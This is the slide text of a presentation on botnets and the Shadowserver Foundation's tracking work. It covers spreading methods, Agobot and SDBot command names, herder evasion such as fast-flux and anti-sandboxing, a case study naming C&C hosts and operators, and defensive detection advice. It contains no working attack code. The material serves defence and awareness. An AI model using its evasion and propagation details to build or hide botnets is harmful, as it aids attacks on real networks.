Botnets and Botherders The Shadowserver Foundation

1
Botnets and BotherdersThe Shadowserver Foundation

• Hillar Leoste

2
Agenda

• Botnets
• Shadowserver
• Botnets IRL
• Questions

3
Botnets The Good, Bad, and Ugly

• A look into the methods, usage, control, and
  motivations of botnet herders

4
Definitions

• Botnet
• A distributed network of compromised computers
  controlled by a malicious user via a command
  control mechanism.
• CC
• Command Control
• A computer or a network of computers, controlled
  by a herder, that sends commands to the botnet.

• Drone or Zombie
• A compromised computer that receives commands via
  the CC
• Bot Herder
• Individual who owns or controls the botnet.
• IRC
• A protocol designed for real time chat
  communication based on client-server architecture

5
Botnets - Spreading

• Scanning
• exploiting vulnerabilities
• Night of the Living Dead
• Email and IM links
• still a major vector
• Drive-by Downloads
• Web redirects
• Social networking sites
• P2P sharing

6
Distribution Server
Internet
1. Are you vulnerable for Win X problem ?
2. Yes / No
3. If Yes send malware to infect
4. After installation connect to CC
5. Master command download / update
6. Request download from dist. server
7. Sends requested download
Bot autopropagation infection scheme
7
Botnets Spreading
8
Botnets - Infections
9
Botnets 0day InfectionsMonthly stats
10
Botnets Retest InfectionsMonthy stats
11
Bot - Details

• Architecture
• Agobot
• Sophisticated Complete Modular
• Rootkit-like capabilities
• P2P protocol
• SDBot
• Much simpler smaller
• Easy to extend
• Hundreds of variants

• Control
• Agobot
• Standard and custom IRC command
• ddos_maxthreads
• spam_aol_channel
• bot_topiccmd
• SDBot
• Lightweight IRC
• Executes channel topic as command
• Interprets other messages as commands

12
Bot - Details

• Propagation
• Agobot
• Assigns network ranges to drones
• scan.addnetrange
• scan.startall
• SDBot
• Base version has no scanning capabilities
• Variants now include scanning and propagation
• very advanced

• Attack Mechanisms
• Agobot
• Elaborate set of self contained modules
• Many types of DDoS attacks
• SDBot
• No exploits in base version
• Easily and rapidly expanded

13
Botnets - Control

• Centralized
• IRC
• Easy to Deploy
• Low Latency
• Central weak link
• HTTP
• Drone calls home via port 80
• Can seem like normal traffic

• Distributed
• P2P
• No central server
• More complex
• More difficult to detect and takedown
• Hybrid
• IRC/HTTP
• P2P/HTTP

14
Botnets - Usage

• DDoS attacks
• TCP or UDP floods
• HTTP spidering
• Spamming
• Phishing
• Harvest email addresses
• Traffic Sniffing
• Interesting clear-text data
• Can help 'steal' other botnets

• Keylogging E-Fraud
• bypasses encrypted channels
• use of filters
• Malware Propagation
• scanning and infecting
• rapid deployment of exploits
• Clickthrough Fraud
• pay-per-click
• manipulate polls, surveys, etc.
• Warez and Pirated Goods

15
Webserver / node
Computer Crash
Internet
Access line blocked
Botnet attack on a webserver / node
16
Botnets Usage (DDoS)
17
Botnets Herder Defense

• Use of Dynamic DNS
• Short TTL in DNS Records (Fastflux)
• Channel and Server Changes
• Being directed to another CC
• Via HTTP download
• Obfuscate drone hostnames
• Encryption of intra-channel communications
• Modified IRC servers
• Anti-Sandbox mechanisms in binaries

18
Botnets - Motivation

• Script Kiddies stay away !
• For-profit industry
• Becoming an Industry
• underground network
• various roles
• Targeted Attacks
• Sophistication
• Industrial Espionage
• State Sponsored

19
Botnets Organizational

• Dedicated networks
• IRC, P2P, Web sites
• Various roles and hierarchies
• Advertising
• Consumer Reports
• Traffic in a variety of goods and services
• Public Information
• No presumption of privacy
• Relationships

20
Botnets - Relationships
21
Botnets - Relationships
22
Detection, Tracking, and Closure?

• The Shadowserver Foundation process and
  methodology

23
Shadowserver

• The Shadowserver Foundation
• An all volunteer watchdog group of security
  professionals that gather, track, and report on
  malware, botnet activity, and electronic fraud.
• It is the mission of the Shadowserver Foundation
• To improve the security of the Internet by
  raising awareness of the presence of compromised
  servers, malicious attackers, and the spread of
  malware.

24
Shadowserver
25
Botnets Detection Capture

• Honeypots
• Auto-submit
• Deploy on wide variety of IP space
• Server Client based
• Honeytokens
• Email IM - IRC
• Spamtraps
• Link spam
• Social networking
• Forums

• Server based
• Emulate vulnerable systems
• Deploy and wait
• Nepenthes
• Client based
• Threats are changing
• Initiate connections to Internet
• Emulate a user
• Seed with known malicious URLs
• HoneyC Capture-HPC

26
Botnets - Nepenthes
27
Botnets - Sandboxing

• Manual
• Static
• Dynamic
• Automated
• Notification
• Classification
• The Basics
• CC address Port Channel
• Nick Ident
• Passwords

28
Botnets - Tracking
29
Botnets - Tracking
30
Shadowserver Revisited Reports500 Custom
reports produced daily

• Report Types
• DDoS
• CC List
• Compromised Host
• Click-Through Fraud
• Drones
• Proxies
• URL Report
• Filters
• ASN
• CIDR
• Country Code

• Recipients
• 30 CERTS
• 100 ASN owners
• Bleeding Edge Snort
• 5 Public IRC Services
• 3 DNS Registrars
• 4 Commercial Vendors
• 2 private mailing lists
• 7 International LEOs
• 3 US Federal LEOs
• 5 International government critical
  infrastructure groups

31
Shadowserver Revisited DDoS Reports
32
Two Minutes
33
Botnets Real Life

• A case study of a group of bad actors on their
  actions and methodology

34
Botnets Real Life
35
Botnets Real Life

• Binary captured by honeypot system on 2006-08-22
• SDBot variant using rap_at_tamer.pikolata.net6121
• Used 32 different hosts (IPs) as CC servers in
  less than 60 days
• Moved between servers at least 40 times
• At least six other control channels known to use
  this hostname

36
Real Life The Malware

• The CC spread 51 unique binaries in the two
  months
• Two-thirds were SDBot variants, others are RBot,
  Zapchast, Parite.B, Kirsun, ...

37
Real Life - Speading

• Using standard spreading mechanisms (asn, dcom,
  lsass, ...)

38
Real Life - Usage

• Running DDOS (targets were usually servers being
  run by 'enemy' groups)
• Keylogging (Data used for ID theft and efraud)

39
Real Life More Usage

• Click-fraud (Money-making. Accounts could be used
  to track back the herders)
• Clone flooding (Often advertising new underground
  servers and carding channels)

40
Real Life - Cooperation

• Cooperative scanning of network ranges
• Downloading/Installing binaries for a 'friend' or
  in exchange for something
• Helping out with bots to ddos targets that can
  handle a high load
• Sharing/trading private IRC servers
• Sharing/trading bot sources and binaries

41
Real Life - ChanOps
mrbet DDOS, Sniffing
MrYlLi Clone flooding, proxies

• KaHIN
• DDOS, Clone flooding
• Location Turkey
• Realname Mehmet

42
Real Life More ChanOps
Sh3llx DDOS, Sniffing, Clone flooding
Bill DDOS Location Kosovo
gu3sT DDOS, Proxies, Clone flooding
43
Real Life - Summary

• Several domain names were removed
• Several servers shutdown
• No real affect on the operations of this group
• Why?

44
Future Trends

• Where is all this going? What do we have to look
  forward to?

45
Future Trends - Malware

• Rootkits
• AntiVirus Detection
• Scripting Worms
• RSS Hijack
• Client-side Exploits
• Escalation of Privileges
• Packers and Protectors
• Themida, private packers

46
Future Trends - Themida
47
Future Trends - Botnets

• New Protocols
• HTTP P2P VOIP IM
• Nugache, Skype and Storm worm
• Encryption
• Covert channels via TCP and ICMP tunneling
• Smaller and Distributed Botnets
• Distributed DNS services
• Stronger Protection of the Botnet
• Industry Bankroll

48
HTTP based CC

• Black Energy
• Very simple and light
• DDOS
• Last known version 1.9.2
• http//asert.arbornetworks.com/2007/10/blackenergy
  -ddos-bot-analysis-available

49
HTTP based CC

• Zunker
• Sophisticated
• SPAM
• http//pandalabs.pandasecurity.com/archive/Zunker.
  aspx

50
HTTP based CC

• MPack
• ICEPack
• Barracuda
• Pinch
• etc

51
Customer Actions

• Is there anything of value for my customers?

52
Customers

• What should you be telling your customers?
• What can they be doing?
• How will any of this help them?

53
Botnets Detection Methods

• Network Traffic
• Connections to IRC or known CC servers
• Rate of outgoing connections
• DNS Trends
• Unusual rate of lookups
• Sudden increase in lookups across network
• Intrusion Detection Systems (IDS)
• BleedingEdge Threats Signatures
• Listen to your Users

54
Botnets Defensive Strategies

• Patching
• Inventory all services
• Limited Privileges
• Applies to entire user base
• Firewalls
• Don't forget Egress filtering
• Rate-limiting of uncommon protocols and ports
• Anti-spoof filters
• Antivirus Antispyware
• Caveats
• IDS
• Place it on all nets
• FTP traffic on non-standard ports

• Netflow
• Proxy all Internet Traffic
• Logs will contain everything
• Log Analysis
• Use the various tools and products
• DNS Blackhole
• Current lists of known bad sites
• Vulnerability Awareness
• Mailing Lists, RSS, etc.
• User Awareness Education
• Can't be overstated

55
Shadowserver and YOU

• Cooperation and Collaboration
• Data
• Share experiences and discoveries

56
Shadowserver

• http//www.shadowserver.org

57
Questions